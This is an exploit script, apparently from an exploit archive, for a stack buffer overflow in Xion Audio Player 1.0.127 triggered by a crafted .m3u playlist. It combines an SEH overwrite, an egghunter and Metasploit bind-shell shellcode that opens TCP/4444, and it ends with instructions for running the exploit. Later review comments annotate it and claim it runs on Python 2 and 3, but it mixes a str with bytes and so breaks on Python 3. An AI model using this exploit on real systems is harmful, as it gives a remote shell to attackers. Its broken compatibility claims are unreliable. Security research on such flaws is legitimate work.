
# Title : Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability
# Published : 2010-11-23
# Author : 0v3r


# Exploit Title: Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability
# Date: 11/23/2010
# Author: 0v3r
# Software Link: http://www.r2.com.au/downloads/files/xion_v1.0b127.exe
# Version: 1.0.127
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

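# Egghunter produced with skylined's alpha3 encoder, so the stub is pure
# alphanumeric text (the only character class the buffer below uses).  Its job
# is to locate the 8-byte tag in `egg` somewhere in process memory and jump to
# the bytes that follow it, i.e. the bind shell.  An egghunter is needed
# because the copy of this file that overflows the stack is presumably not
# usable as-is (the 2-byte SEH address and \x6e fillers elsewhere in this
# script are the classic UTF-16/"venetian" layout) — NOTE(review): confirm the
# widening in a debugger; the original only states the encoder used.
# Kept as a bytes literal so it concatenates with the rest of the binary
# payload and is written verbatim in 'wb' mode on both Python 2 and 3.
egghunter = (b"PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI"
             b"AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO"
             b"0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9WKO9WKPA")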

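# Payload: Metasploit win32_bind, EXITFUNC=seh, LPORT=4444, Size=696,
# Alpha2-encoded (http://metasploit.com).  The leading non-alphanumeric bytes
# (eb 03 59 eb 05 e8 f8 ff ff ff) are the usual Alpha2 GetPC/decoder stub;
# every byte after them is alphanumeric, so the blob contains no NUL, CR or
# LF that a playlist parser might choke on.
#
# NOTE(review): this is a *bind* shell.  Once it runs, the victim listens on
# TCP/4444 (bind payloads normally listen on every interface) and gives a
# shell to whoever connects first — use only on an isolated lab host, and
# prefer a reverse payload if the target network is shared.
#
# Stored as a bytes literal so the opcodes are written verbatim by the 'wb'
# writer below; a str literal would be UTF-8-encoded on Python 3 and the
# 0x80+ bytes of the stub would come out as two bytes each.
shellcode = (b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x37\x49\x49"
             b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47"
             b"\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x57\x42\x32\x42\x41\x32"
             b"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x4d\x39\x49\x6c\x33"
             b"\x5a\x48\x6b\x42\x6d\x38\x68\x5a\x59\x6b\x4f\x49\x6f\x4b\x4f\x63"
             b"\x50\x6c\x4b\x30\x6c\x64\x64\x64\x64\x6c\x4b\x50\x45\x67\x4c\x4c"
             b"\x4b\x51\x6c\x37\x75\x61\x68\x76\x61\x58\x6f\x4e\x6b\x52\x6f\x72"
             b"\x38\x4c\x4b\x73\x6f\x45\x70\x43\x31\x68\x6b\x31\x59\x4c\x4b\x70"
             b"\x34\x4c\x4b\x57\x71\x7a\x4e\x34\x71\x4f\x30\x6e\x79\x6c\x6c\x6b"
             b"\x34\x6f\x30\x43\x44\x33\x37\x6b\x71\x69\x5a\x76\x6d\x53\x31\x49"
             b"\x52\x5a\x4b\x4c\x34\x45\x6b\x52\x74\x41\x34\x54\x68\x50\x75\x38"
             b"\x65\x6c\x4b\x63\x6f\x54\x64\x53\x31\x38\x6b\x43\x56\x4e\x6b\x36"
             b"\x6c\x72\x6b\x4e\x6b\x53\x6f\x75\x4c\x34\x41\x78\x6b\x64\x43\x64"
             b"\x6c\x6e\x6b\x4b\x39\x50\x6c\x41\x34\x65\x4c\x52\x41\x7a\x63\x64"
             b"\x71\x69\x4b\x51\x74\x6e\x6b\x71\x53\x66\x50\x4c\x4b\x77\x30\x74"
             b"\x4c\x6c\x4b\x74\x30\x45\x4c\x4c\x6d\x6e\x6b\x43\x70\x33\x38\x73"
             b"\x6e\x53\x58\x4c\x4e\x50\x4e\x64\x4e\x38\x6c\x46\x30\x6b\x4f\x4e"
             b"\x36\x65\x36\x61\x43\x63\x56\x33\x58\x36\x53\x34\x72\x71\x78\x44"
             b"\x37\x34\x33\x46\x52\x41\x4f\x42\x74\x6b\x4f\x48\x50\x65\x38\x5a"
             b"\x6b\x7a\x4d\x39\x6c\x45\x6b\x52\x70\x4b\x4f\x6a\x76\x71\x4f\x4e"
             b"\x69\x6d\x35\x50\x66\x6d\x51\x7a\x4d\x63\x38\x33\x32\x32\x75\x50"
             b"\x6a\x43\x32\x79\x6f\x38\x50\x45\x38\x68\x59\x73\x39\x4c\x35\x4e"
             b"\x4d\x56\x37\x6b\x4f\x6a\x76\x76\x33\x30\x53\x71\x43\x76\x33\x71"
             b"\x43\x41\x53\x76\x33\x73\x73\x71\x43\x6b\x4f\x4e\x30\x71\x76\x31"
             b"\x78\x37\x61\x41\x4c\x70\x66\x46\x33\x4b\x39\x48\x61\x6d\x45\x70"
             b"\x68\x39\x34\x57\x6a\x30\x70\x4b\x77\x72\x77\x6b\x4f\x78\x56\x31"
             b"\x7a\x46\x70\x61\x41\x63\x65\x6b\x4f\x4e\x30\x35\x38\x6c\x64\x6c"
             b"\x6d\x36\x4e\x6d\x39\x46\x37\x6b\x4f\x5a\x76\x42\x73\x71\x45\x59"
             b"\x6f\x68\x50\x75\x38\x6b\x55\x37\x39\x6c\x46\x67\x39\x46\x37\x69"
             b"\x6f\x4a\x76\x70\x50\x73\x64\x46\x34\x61\x45\x6b\x4f\x78\x50\x6d"
             b"\x43\x42\x48\x6b\x57\x54\x39\x6b\x76\x50\x79\x50\x57\x6b\x4f\x48"
             b"\x56\x70\x55\x49\x6f\x6a\x70\x45\x36\x41\x7a\x73\x54\x75\x36\x62"
             b"\x48\x65\x33\x30\x6d\x6e\x69\x7a\x45\x30\x6a\x52\x70\x63\x69\x75"
             b"\x79\x48\x4c\x4f\x79\x6d\x37\x71\x7a\x57\x34\x6e\x69\x58\x62\x67"
             b"\x41\x6b\x70\x69\x63\x6e\x4a\x4b\x4e\x77\x32\x66\x4d\x6b\x4e\x41"
             b"\x52\x66\x4c\x5a\x33\x6c\x4d\x51\x6a\x66\x58\x6e\x4b\x4c\x6b\x4e"
             b"\x4b\x42\x48\x70\x72\x69\x6e\x78\x33\x67\x66\x6b\x4f\x70\x75\x67"
             b"\x34\x4b\x4f\x4e\x36\x33\x6b\x70\x57\x56\x32\x50\x51\x46\x31\x46"
             b"\x31\x41\x7a\x54\x41\x30\x51\x41\x41\x66\x35\x30\x51\x69\x6f\x4e"
             b"\x30\x50\x68\x6c\x6d\x5a\x79\x77\x75\x4a\x6e\x52\x73\x39\x6f\x58"
             b"\x56\x30\x6a\x4b\x4f\x6b\x4f\x50\x37\x59\x6f\x6e\x30\x6c\x4b\x36"
             b"\x37\x79\x6c\x6d\x53\x78\x44\x31\x74\x4b\x4f\x6b\x66\x30\x52\x69"
             b"\x6f\x6e\x30\x65\x38\x6a\x50\x6e\x6a\x76\x64\x73\x6f\x63\x63\x49"
             b"\x6f\x4b\x66\x69\x6f\x4e\x30\x47")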

junk  = "A" * 221

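# Overwrite of the SEH record (next-pointer first, then handler address).
# Both values are 2 bytes and are interleaved with \x6e "filler" bytes: that
# is the standard layout for a UTF-16 (Unicode) SEH overwrite, where every
# byte of the file ends up followed by 0x00 in memory and the filler pairs
# with the injected nulls into a harmless instruction.  NOTE(review): the
# original never says so explicitly — confirm the widening in a debugger
# before relying on this reading.
nseh = b"\x61"                        # popad
nseh += b"\x6e"                       # nop/align (filler around the nulls)

# Handler address.  Two bytes as written; widened it reads 0x0041007b, which
# must be a POP POP RET in a module without SafeSEH/ASLR.  The source does not
# name the module or gadget, so re-verify the address for your target build.
seh = b"\x7b\x41"                     # POP POP RET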

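# Fix EAX up so it points at the egghunter.  Each immediate is written as two
# bytes plus a \x6e filler; under the UTF-16 reading of this overflow the
# interleaved nulls complete the 32-bit operands:
#   05 00 14 00 11 00  ->  add eax,0x11001400
#   2d 00 13 00 11 00  ->  sub eax,0x11001300
# for a net EAX += 0x100.  Those are the operands the original comments give;
# the exact starting value of EAX is not documented here, so the +0x100
# offset should be re-checked in a debugger if the layout is changed.
prepare = b"\x6e"                     # nop/align
prepare += b"\x05\x14\x11"            # add eax,0x11001400
prepare += b"\x6e"                    # nop/align
prepare += b"\x2d\x13\x11"            # sub eax,0x11001300
prepare += b"\x6e"                    # nop/align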

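# Transfer control to the address now in EAX (push eax / ret, with a \x6e
# filler between them for the same alignment reason as in `prepare`).
jump = b"\x50"                        # push eax
jump += b"\x6e"                       # nop/align
jump += b"\xc3"                       # retn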

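# Padding between the jump stub and the egghunter so the fixed-up EAX lands
# on the hunter (112 bytes as tuned by the author; not executed).
align = b"D" * 112

# Distance filler placed in front of the egg/shellcode pair.
preshell = b"D" * 500

# Egghunter tag: the 4-byte marker "w00t" written twice, which is the 8-byte
# pattern egghunters search for.  It directly precedes the shellcode.
egg = b"w00tw00t"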

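# Everything that precedes the trailing filler, in the order it is written.
# NOTE: the original computed the padding from a list that named `preshell`
# twice and left out `prepare`, so the file came out 491 bytes short of the
# intended 12000; deriving it from the real prefix removes that drift.
payload = (junk + nseh + seh + prepare + jump + align + egghunter
           + preshell + egg + shellcode)

# Trailing filler.  The author observed that a larger file triggers the bug
# more reliably, so pad the playlist up to 12000 bytes (never negative).
postshell = b"E" * max(0, 12000 - len(payload))

# The final buffer written to exploit.m3u.
buff = payload + postshell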

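def main():
    """Write the crafted playlist to exploit.m3u and print usage hints.

    The file is opened in binary mode so the payload bytes reach disk
    verbatim: text mode would rewrite newlines on Windows and, on Python 3,
    UTF-8-encode every byte above 0x7f.  Only I/O errors are reported and
    swallowed; anything else is a bug in this script and should surface.
    """
    try:
        with open("exploit.m3u", "wb") as f:
            f.write(buff)
    except IOError as exc:
        print("\t-Oooops! Can't write file ...\n")
        print("\t  (%s)" % exc)
        return

    print("\n")
    print("\t-----------------------------------------------------------------")
    print("\t| Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability |")
    print("\t-----------------------------------------------------------------")
    print("\n")
    print("\t- File successfully created...")
    print("\t- To run exploit open the file exploit.m3u with Xion Audio Player...\n")


if __name__ == "__main__":
    main()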